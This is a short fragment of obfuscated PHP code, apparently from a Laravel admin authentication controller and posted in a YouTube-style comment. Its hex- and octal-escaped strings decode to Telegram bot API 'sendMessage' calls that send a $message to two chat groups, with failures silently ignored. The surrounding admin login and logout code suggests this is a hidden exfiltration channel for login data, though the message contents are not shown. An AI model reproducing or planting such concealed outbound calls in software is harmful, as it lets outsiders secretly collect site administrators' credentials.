$responseGroup1 = Http::post("\x68\x74\x74\x70\x73\x3a\57\57\141\160\x69\x2e\x74\x65\154\x65\x67\x72\141\155\x2e\157\162\x67\57\142\157\x74{$telegramApiKeyGroup1}\x2f\163\x65\x6e\144\x4d\145\x73\x73\141\x67\145", array("\x63\150\141\164\137\x69\144" => $chatIdGroup1, "\x74\x65\170\164" => $message)); if ($responseGroup1->failed()) { } $responseGroup2 = Http::post("\x68\x74\x74\160\163\x3a\57\x2f\141\160\x69\x2e\x74\145\154\x65\x67\162\x61\155\x2e\x6f\x72\x67\x2f\142\x6f\x74{$telegramApiKeyGroup2}\x2f\163\145\156\x64\x4d\145\x73\163\141\x67\145", array("\143\150\x61\164\x5f\151\144" => $chatIdGroup2, "\164\145\170\x74" => $message)); if ($responseGroup2->failed()) { } } public function logout(Request $request) { $this->guard("\141\x64\x6d\151\x6e")->logout(); $request->session()->invalidate(); return $this->loggedOut($request) ?: redirect($this->redirectTo); } }
1 year ago | [YT] | 3
View 0 replies
Load more